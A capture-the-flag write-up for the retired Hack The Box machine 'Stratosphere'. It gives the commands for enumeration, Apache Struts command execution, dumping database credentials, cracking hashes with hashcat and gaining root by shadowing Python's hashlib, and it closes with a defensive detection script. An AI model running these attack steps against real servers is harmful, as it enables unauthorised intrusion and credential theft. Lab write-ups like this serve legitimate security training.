Hackthebox – Stratosphere Writeup


This is a writeup for the Stratosphere machine on hackthebox.eu which was retired on 9/1/18!

First, enumerate! Let’s try the custom python enumeration script a friend of ours made:
https://github.com/vishalb2308/Pentest-Enumeration-Script/blob/master/EnumScript.py

This means we run the following 3 commands:
mkdir /root/Desktop/MyScripts
mkdir /root/Desktop/MyScripts/Reports
python3 EnumScript.py

The script reports that ports 22, 80, and 8080 are open.
Note: SSH supports password and public-key authentication.
The script also ran nikto, which found host-manager, index, and manager as pages, but we need more; what we have isn't giving us anything.

Let’s try gobuster instead:
sudo apt-get update
sudo apt-get install gobuster
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.64 -x php,html,txt,jsp -t 100

We got an additional /Monitoring directory after gobuster ran for a while.

On the Monitoring page, looking at the scripts shows a lot of .action extensions. We google this and find that it's an extension associated with Apache Struts. Therefore, let's try the following exploit:
https://github.com/mazen160/struts-pwn
We run:
python exploit.py --url '10.10.10.64/Monitoring/example/Login.action' -c 'ls'

There is a file called db_connect, so we run:
python exploit.py --url '10.10.10.64/Monitoring/example/Login.action' -c 'cat db_connect'
This is returned to us:
[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin

Seems it's a MySQL database, so we run:
python exploit.py --url '10.10.10.64/Monitoring/example/Login.action' -c 'mysql -uadmin -padmin -e"show databases"'
This returns the following 3 databases:
Database
information_schema
users

Now we run:
python exploit.py --url '10.10.10.64/Monitoring/example/Login.action' -c 'mysql -uadmin -padmin -e"show tables from users"'
python exploit.py --url '10.10.10.64/Monitoring/example/Login.action' -c 'mysql -uadmin -padmin -e"use users; select * from accounts"'

This gave us the following row with fullname, password, and username!
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard

Let's try to SSH in with this:
ssh richard@10.10.10.64

Got user!!

Next, on to root.

We see a test.py. Let's do it, using hashcat, I guess.

Put the first one in a file called hash1 and use the following command:
hashcat -m 0 hash1 ../rockyou.txt --force
Cracked, with it being kaybboo!

The next one is SHA1, so that's -m 100:
hashcat -m 100 hash2 ../rockyou.txt --force
Cracked it, with it being: ninjaabisshinobi

The next one is MD4, so -m 900:
hashcat -m 900 hash3 ../rockyou.txt --force
Cracked, with it being legend72

The last one is BLAKE2b, which is -m 600:
hashcat -m 600 hash4 ../rockyou.txt --force
Note: make sure you put $BLAKE2$ before the hash for this one.
Cracked with: Fhero6610

Well, that was a rabbit hole... permission denied. Great.

OK, so let's study the Python file, since we can run it as sudo.

It imports hashlib, so let's just put a file called hashlib.py in /home/richard with the following contents:
import os
os.system('/bin/bash')

Now let's run it!
sudo /usr/bin/python3.5 /home/richard/test.py

Voila, we have root.
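Why the hashlib.py trick works, and how a defender can spot the same condition elsewhere, as an added example that is not part of the writeup: CPython puts the directory of the script being run at the front of sys.path, so a sudo rule for `python3 /home/richard/test.py` lets anyone who can write to /home/richard shadow any standard-library module the script imports. The script below (my own code; function names and the temporary-directory demo are constructed, not from the box) parses a script's imports, reports which ones would resolve to a file in the script's own directory instead of the standard library, and checks whether a non-root user can write there.

```python
import ast
import os
import stat
import tempfile

def shadowed_imports(script_path):
    """Absolute imports in script_path that resolve to a file in the script's
    own directory; CPython puts that directory first on sys.path, so such a
    file is loaded instead of the standard-library module of the same name."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path) as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    hits = []
    for name in sorted(names):
        for cand in (os.path.join(script_dir, name + ".py"),
                     os.path.join(script_dir, name, "__init__.py")):
            if os.path.isfile(cand):
                hits.append((name, cand))
                break
    return hits

def writable_by_non_root(path):
    """Rough check: owner write for a non-root owner, group write for a
    non-root group, or world write lets an unprivileged user drop a module."""
    st = os.stat(path)
    return bool((st.st_uid != 0 and st.st_mode & stat.S_IWUSR)
                or (st.st_gid != 0 and st.st_mode & stat.S_IWGRP)
                or st.st_mode & stat.S_IWOTH)

def build_demo():
    """Constructed replica of the writeup's layout: test.py importing hashlib
    with a user-supplied hashlib.py beside it. Returns the path of test.py."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "test.py"), "w") as fh:
        fh.write("import hashlib\nprint(hashlib.md5(b'x').hexdigest())\n")
    with open(os.path.join(d, "hashlib.py"), "w") as fh:
        fh.write("# stand-in for a module dropped by the unprivileged user\n")
    return os.path.join(d, "test.py")

if __name__ == "__main__":
    script = build_demo()
    for name, path in shadowed_imports(script):
        print(f"{name} would load from {path}, not from the standard library")
    print("directory writable by non-root:", writable_by_non_root(os.path.dirname(script)))
```

The fix on the defending side is to not let sudo run scripts out of a user-writable directory (or to invoke the interpreter with -I, isolated mode, which leaves the script's directory off sys.path).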
